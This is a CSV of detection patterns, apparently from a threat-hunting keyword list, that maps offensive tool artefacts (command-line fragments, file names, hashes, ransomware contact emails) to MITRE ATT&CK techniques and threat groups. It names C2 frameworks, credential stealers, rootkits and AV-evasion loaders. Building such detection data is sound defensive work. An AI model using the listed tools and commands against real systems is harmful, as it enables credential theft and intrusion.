"*Deleting RecentFileCache.bcf*",".{0,1000}Deleting\sRecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40732"
"*deliver.exe -d -c * -f*.enc*",".{0,1000}deliver\.exe\s\-d\s\-c\s.{0,1000}\s\-f.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","40733"
"*deliver.exe -d -f *.enc*",".{0,1000}deliver\.exe\s\-d\s\-f\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","40734"
"*dementor - rough PoC to connect to spoolss to elicit machine account authentication *",".{0,1000}dementor\s\-\srough\sPoC\sto\sconnect\sto\sspoolss\sto\selicit\smachine\saccount\sauthentication\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","40735"
"*dementor.py -d * -u * -p *",".{0,1000}dementor\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","rough PoC to connect to spoolss to elicit machine account authentication","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","40736"
"*demo-bof.cna*",".{0,1000}demo\-bof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","40737"
"*demo-client.exe *",".{0,1000}demo\-client\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40738"
"*demo-controller.exe *",".{0,1000}demo\-controller\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40739"
"*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40740"
"*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40741"
"*denandz/KeeFarce*",".{0,1000}denandz\/KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","40742"
"*denandz/SecretServerSecretStealer*",".{0,1000}denandz\/SecretServerSecretStealer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","40743"
"*Dendrobate-master*",".{0,1000}Dendrobate\-master.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","40744"
"*dendron*FileMonInject.dll*",".{0,1000}dendron.{0,1000}FileMonInject\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","40745"
"*DeNiSe-master.zip*",".{0,1000}DeNiSe\-master\.zip.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","40746"
"*DeNiSePkg.py*",".{0,1000}DeNiSePkg\.py.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","40747"
"*deploycaptureserver.ps1*",".{0,1000}deploycaptureserver\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","40748"
"*DeployPrinterNightmare*",".{0,1000}DeployPrinterNightmare.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40749"
"*DeployPrinterNightmare.exe*",".{0,1000}DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40750"
"*derdiarikucisv@gmx.de*",".{0,1000}derdiarikucisv\@gmx\.de.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40751"
"*deritim@proton.me*",".{0,1000}\""deritim\@proton\.me\"".{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40752"
"*Description'>IE Passwords Viewer*",".{0,1000}Description\'\>IE\sPasswords\sViewer.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40755"
"*DesertNut.csproj*",".{0,1000}DesertNut\.csproj.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40758"
"*DesertNut.exe*",".{0,1000}DesertNut\.exe.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40759"
"*DesertNut.sln*",".{0,1000}DesertNut\.sln.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40760"
"*DesertNut_h.cs*",".{0,1000}DesertNut_h\.cs.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40761"
"*Desktop\AutoCrypt_Password.txt*",".{0,1000}Desktop\\AutoCrypt_Password\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","40763"
"*DESKTOP-PRINTINGFUN\*",".{0,1000}DESKTOP\-PRINTINGFUN\\.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","40764"
"*-destPipe * -pipeHost * -bindPort *",".{0,1000}\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-bindPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","40765"
"*Destroying all droplets*",".{0,1000}Destroying\sall\sdroplets.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40766"
"*details-c80a6994018b23dc.js*",".{0,1000}details\-c80a6994018b23dc\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","40768"
"*detect ntdll.dll*",".{0,1000}detect\sntdll\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40769"
"*Detected a Windows Server version not compatible with JuicyPotato*",".{0,1000}Detected\sa\sWindows\sServer\sversion\snot\scompatible\swith\sJuicyPotato.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","40770"
"*Detected possible phantom shell command*",".{0,1000}Detected\spossible\sphantom\sshell\scommand.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","40771"
"*detect-hooksx64.*",".{0,1000}detect\-hooksx64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","40772"
"*dev.l1qu1d.net/wraith-labs/wraith*",".{0,1000}dev\.l1qu1d\.net\/wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","40774"
"*dev-2null/ADCollector*",".{0,1000}dev\-2null\/ADCollector.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","40775"
"*DEV-COBBR\\TestAdmin*",".{0,1000}DEV\-COBBR\\\\TestAdmin.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","40776"
"*Device architecture unknown. Download cloudflared/loclx manually*",".{0,1000}Device\sarchitecture\sunknown\.\sDownload\scloudflared\/loclx\smanually.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","40777"
"*devine@cr0.net*",".{0,1000}devine\@cr0\.net.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#email #linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","40779"
"*df00930aa6c14a657802dcc5f6d397038ae4c8206bfef8a810a6fa7530fc6521*",".{0,1000}df00930aa6c14a657802dcc5f6d397038ae4c8206bfef8a810a6fa7530fc6521.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40786"
"*df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f*",".{0,1000}df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40787"
"*df0be334160f7fbd522056f8944947f228aa93479fe3981c84a221d2cd733ddc*",".{0,1000}df0be334160f7fbd522056f8944947f228aa93479fe3981c84a221d2cd733ddc.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","40789"
"*df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc*",".{0,1000}df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40790"
"*df117b05c21cd8ef0c6c4d85290d81532838e4645677bdb2955a968eba9da682*",".{0,1000}df117b05c21cd8ef0c6c4d85290d81532838e4645677bdb2955a968eba9da682.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","40791"
"*df13fa4302b5994f61271abcf3bfbb9c7c4cf881dbc6631735916fe3ca891043*",".{0,1000}df13fa4302b5994f61271abcf3bfbb9c7c4cf881dbc6631735916fe3ca891043.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40793"
"*df1d68f681e71e7c78c734a467a4aa7d968c1bb11760868b13d93ffa7f65a0c0*",".{0,1000}df1d68f681e71e7c78c734a467a4aa7d968c1bb11760868b13d93ffa7f65a0c0.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","40795"
"*df2bd01c22fd9c3bbcb01f8945a7b70d2c5b3d48dcd47ecb1e44a46ca47cd67c*",".{0,1000}df2bd01c22fd9c3bbcb01f8945a7b70d2c5b3d48dcd47ecb1e44a46ca47cd67c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","40800"
"*df31292f5844d7a8c8ea8c37704d23b28b8598449cda50b6cae9e85614277977*",".{0,1000}df31292f5844d7a8c8ea8c37704d23b28b8598449cda50b6cae9e85614277977.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40801"
"*df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb*",".{0,1000}df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40802"
"*df354b2e87294f8b650fc5f43b3f4ec1ac2aa193e5d67f63a42887f77fa1aad5*",".{0,1000}df354b2e87294f8b650fc5f43b3f4ec1ac2aa193e5d67f63a42887f77fa1aad5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","40804"
